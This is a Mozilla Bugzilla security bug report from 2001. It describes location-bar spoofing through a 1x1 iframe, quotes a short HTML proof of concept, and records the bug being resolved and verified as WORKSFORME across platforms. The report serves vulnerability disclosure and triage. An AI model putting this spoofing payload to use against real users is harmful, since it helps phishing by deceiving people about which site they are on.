Spoofing location using tiny iframe

VERIFIED WORKSFORME

Status

()

Core
Security
VERIFIED WORKSFORME
17 years ago
16 years ago

People

(Reporter: Mitchell Stoltz (not reading bugmail), Assigned: Mitchell Stoltz (not reading bugmail))

Tracking

Trunk
x86
Windows NT
Points:
---

Firefox Tracking Flags

(Not tracked)

Details

There is vulnerability at least in build 20010524 which allows spoofing the
location bar
with the help of <iframe> - the iframe's location is displayed in the location bar

---------------------------------------------
<html>
<iframe src="http://www.mozilla.org" width=1 height=1></iframe>
<h1>
This page is spoofed - look at the location bar.
<br>
Written by Georgi Guninski
</h1>
</html>
---------------------------------------------

Georgi Guninski
Unless I'm missing something, this is bug 82236, isn't it?
(Assignee)

Comment 2

17 years ago
Could be a dup of 82236, I'm not quite sure. In any case, this worksforme with a
build from 5/29, and so does 82236 if I'm reading that one right.
Status: NEW → RESOLVED
Last Resolved: 17 years ago
Resolution: --- → WORKSFORME

Comment 3

17 years ago
Marking VERIFIED WORKSFORME on:
-MacOS91 2001-06-01-08-trunk
-Win98SE 2001-06-01-06-trunk
-LinRH62 2001-06-01-08-trunk
Status: RESOLVED → VERIFIED
(Assignee)

Comment 4

16 years ago
Removing NS_Confidential flag.
Group: netscapeconfidential?
You need to log in before you can comment on or make changes to this bug.